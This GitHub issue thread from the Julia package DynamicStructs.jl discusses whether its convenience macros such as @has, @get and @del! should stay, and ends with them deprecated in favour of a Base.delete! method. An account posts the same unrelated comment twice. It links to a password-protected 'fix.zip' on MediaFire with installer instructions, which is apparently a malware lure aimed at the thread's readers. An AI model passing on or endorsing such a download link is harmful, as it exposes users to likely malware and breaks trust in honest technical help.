### ISSUE TITLE
Are convenience macros that convenient?

### ISSUE THREAD

**Issue by ameligrana** [AntonOresten/DynamicStructs.jl#17]
I'd like only to share my opinion on them: I don't see much of a point because they are a bit harder to parse to me because they are not usual Julia syntax. Do they have some precendence? Yet they are just optional so if you have strong feelings about them I don't really mind that much leaving them as they are @AntonOresten (and probably it is like so :D)

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AntonOresten** [comment]
I agree that we might wanna be conservative with cluttering up namespaces, especially with vague macros like these.
Before I created thesm, I found myself writing things like `hasproperty(x, :name) ? x.name : default`, which, while Julian, is just a bit cumbersome to write, whereas `@has x.name ? x.name : default` or `@get x.name default` feels a lot more natural, and lets us stick to `.` notation for referring to properties.

But just because we *can*, doesn't mean we *should*, I guess. Regardless, they're optional, and users can choose to just import the relevant bits. We may consider not exporting these macros though, but perhaps still mark them as `public` or something (new 1.11 feature).

I'm open to remove some/all of these in a breaking release, especially `@get` and `@get!` which now in hindsight are unnecessary, though concise. `@has` isn't that much more convenient than `hasproperty`. Still, there's currently no way of deleting properties without the `@del!` macro, which emulates the `del x.name` syntax from Python, but maybe we could add a `Base.delete!` method instead, although it seems like that function is currently only used for dictionaries and sets.

Frankly, we're kind of in uncharted territory, as Julia was never meant to be dynamic like this, so new notation may be justified.🤣

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ameligrana** [comment]
> `Base.delete!` method instead, although it seems like that function is currently only used for dictionaries and sets.

I think this would be lovely, I remember that initially the library had it, I think it would a very good (re-)addition

I kind of dislike the usage of macros when a function alternative are available. Because already popular idioms would be simpler for people to use. Indeed the macros are only a bit more concise than the function alternative. So I would vote for their removal if you don't have strong feelings for them.

**Comment by AntonOresten** [comment]
Sensible! I've gone ahead and deprecated the macros and added the `Base.delete!` method definition to the dynamic macro.

`Base.delete!` might be slightly problematic though, if someone ever decides to subtype `AbstractDict{Symbol}` or `AbstractSet{Symbol}`, where they would expect being able to define a `Base.delete!` method without problems.😋

**Comment by ameligrana** [comment]
Love it, seems like we are converging a bit, but I found some data related to #8 which could lead to something even better
